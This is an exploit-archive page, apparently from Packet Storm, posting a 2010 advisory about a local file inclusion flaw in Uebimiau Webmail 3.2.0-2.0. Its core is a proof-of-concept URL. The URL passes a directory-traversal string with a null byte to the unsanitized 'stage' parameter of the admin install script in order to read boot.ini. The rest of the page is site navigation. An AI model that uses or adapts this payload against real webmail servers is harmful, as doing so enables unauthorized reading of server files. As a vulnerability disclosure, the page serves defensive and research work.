Uebimiau Webmail 3.2.0-2.0 Local File Inclusion

Uebimiau Webmail 3.2.0-2.0 Local File Inclusion: Posted Oct 4, 2010; Authored by Blake; Uebimiau Webmail version 3.2.0-2.0 suffers from a local file inclusion vulnerability.; tags | exploit, local, file inclusion; SHA-256 | 7fc91fe88ddc29761c0a08cb6b86047aa397c875786e4649924f32af2a98044c; Download | Favorite | View

Uebimiau Webmail 3.2.0-2.0 Local File Inclusion

# Exploit Title: Uebimiau Webmail Local File Inclusion
# Date: 10-04-10
# Author: Blake
# Software Link: http://sourceforge.net/projects/t-dahmail/files/latest/Uebimiau_3.2.0_2.0_Alpha.zip/download
# Version: 3.2.0-2.0
# Tested on: Windows XP SP3 running xampp lite
 
The stage parameter is not properly sanitized.
 
POC:
http://127.0.0.1/webmail/admin/install/index.php?stage=../../../../../../../../../boot.ini%00&lid=

Top Authors In Last 30 Days

Red Hat 269 files
Ubuntu 98 files
indoushka 37 files
Gentoo 29 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 12 files
Jim Blankendaal 11 files
Apple 10 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,084)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,560)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,418)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,704)
UNIX (9,432)
UnixWare (187)
Windows (6,668)
Other

Uebimiau Webmail 3.2.0-2.0 Local File Inclusion

Uebimiau Webmail 3.2.0-2.0 Local File Inclusion

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Uebimiau Webmail 3.2.0-2.0 Local File Inclusion

Share This

Uebimiau Webmail 3.2.0-2.0 Local File Inclusion

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems